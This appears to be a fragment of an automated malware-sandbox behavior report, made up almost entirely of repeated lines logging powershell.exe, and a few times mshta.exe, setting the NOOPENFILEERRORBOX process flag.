        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
